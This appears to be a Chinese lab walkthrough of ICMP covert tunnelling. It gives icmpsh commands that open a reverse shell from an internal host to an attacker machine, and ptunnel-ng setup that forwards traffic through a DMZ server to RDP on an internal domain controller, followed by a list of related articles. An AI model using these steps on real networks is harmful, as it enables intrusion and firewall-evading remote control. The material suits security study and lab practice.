內網-隱藏隧道通訊技術,場景復現(ICMP隧道)
隱藏隧道通訊技術(ICMP隧道)
一 icmpsh(跨平臺)
環境:
外網攻擊測試機,內網主機
下載工具:
git clonehttps://github.com/inquisb/icmpsh.git
安裝依賴包:
apt-get install python-impacket
修改icmp通訊方法:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
外網攻擊測試機:
./icmpsh_m.py ip(攻擊) ip(目標) //等待反彈shell
內網主機:
icmpsh.exe -t i p(攻擊) -d 500 -b 30 -s 128
二 pingtunnel(跨平臺,可設定密碼)
2.1 實驗環境
軟體防火牆:
VM配置:雙網路卡:橋接+僅主機
monowall 10.1.1.1/192.168.1.10
公網vps:
VM配置:橋接
kali2020 192.168.1.13
攻擊者PC:
VM配置:橋接
windows7 192.168.1.2
DMZ區伺服器:
VM配置:雙網路卡 僅主機+橋接
kali2020 192.168.1.4/10.1.1.5
內網PC:
VM配置:僅主機
windows2012 10.1.1.2(DC)
2.2 簡單拓撲
2.3 功能實現
通過ICMP協議,使攻擊者能直接控制內網PC
2.4 過程復現
A vps和dmz區伺服器安裝pingtunnel工具
1.下載https://github.com/lnslbrty/ptunnel-ng
2.安裝編譯
tar xf PingTunnel-0.72.tar.gz
cd PingTunnel
make && make install
可能遇到的錯誤
缺少pcap.h
wget http://www.tcpdump.org/release/libpcap-1.9.0.tar.gz
tar zxvf libpcap-1.9.0.tar.gz
cd libpcap-1.9.0
./configure
yacc包錯誤
Sudo apt-get install –y byacc
./configure
make
sudo make install
B 在dmz區伺服器開啟監聽
ptunnel -x shuteer //-x shuteer 設定密碼為shuteer
C 在vps開啟監聽
ptunnel -p 192.168.1.4 -lp 1080 -da 10.1.1.2 -dp 3389 -x shuteer //在vps本地的1080埠監聽dmz區伺服器icmp的流量,並轉發到內網主機的3389埠
引數說明:
-x 指定 icmp 隧道連線驗證密碼
-lp 指定要監聽的本地 tcp 埠
-da 指定要轉發到的機器的 ip 地址
-dp 指定要轉發到的機器的 tcp 埠
-p 指定icmp隧道另一端機器的 ip 地址
D 在攻擊者PC
連線vps伺服器的1080埠,並登入:
相關文章
- 學習內網安全--隱蔽隧道通訊技術內網
- 6、ICMP隧道
- 1、網路隧道技術
- ICMP隱蔽隧道攻擊分析與檢測(二)
- ICMP隱蔽隧道攻擊分析與檢測(三)
- ICMP隱蔽隧道攻擊分析與檢測(四)
- 利用SSH隧道加密技術隱蔽C&C通訊流量加密
- 13、利用 ICMP 隧道穿透防火牆穿透防火牆
- 【技術向】基於工控場景的DNS隧道攻擊方案DNS
- 2、HTTP隧道技術HTTP
- DNS隧道技術解析DNS
- "ssh 反向隧道 實現內網穿透內網穿透
- 計算機網路之隧道技術計算機網路
- DNS Tunnel隧道隱蔽通訊實驗 && 嘗試復現特徵向量化思維方式檢測DNS特徵
- 10、DNS隧道技術再探DNS
- 11、DNS隧道技術調研DNS
- DNS隧道技術繞防火牆DNS防火牆
- 隧道代理技術是什麼?
- 9.5內網橫向&代理&隧道內網
- IPv6改造方案:隧道技術
- IPv6過渡技術之隧道技術
- 內網滲透-隧道代理轉發內網
- 基於工控場景的DNS隧道檢測方案DNS
- Windows ICMP DNS隧道是一種利用ICMP和DNS協議進行網路隧道傳輸的技術。它透過將資料包封裝在ICMP或DNS報文中,繞過防火牆和其他安全裝置,實現在受限網路之間傳輸資料的方法。WindowsDNS協議封裝防火牆
- 【技術向】SSH加密隧道流量攻擊與檢測技術加密
- 用隧道協議實現不同dubbo叢集間的透明通訊協議
- 使用ssh隧道穿透NAT訪問內網主機穿透內網
- HUAWEI防火牆同一例項場景下配置IPSec隧道防火牆
- python Trojan 模組(我忘記幾了)—— 通訊隧道建立Python
- 建築資訊建模技術為隧道建設裝上智慧大腦EB
- 資料隱藏技術資料隱藏
- 4、DNS隧道DNS
- 3、SSL隧道
- 5、SSH隧道
- 7、IP隧道
- 8、ISATAP隧道
- 隧道雲 cpolar
- 什麼是隧道代理 為什麼選隧道代理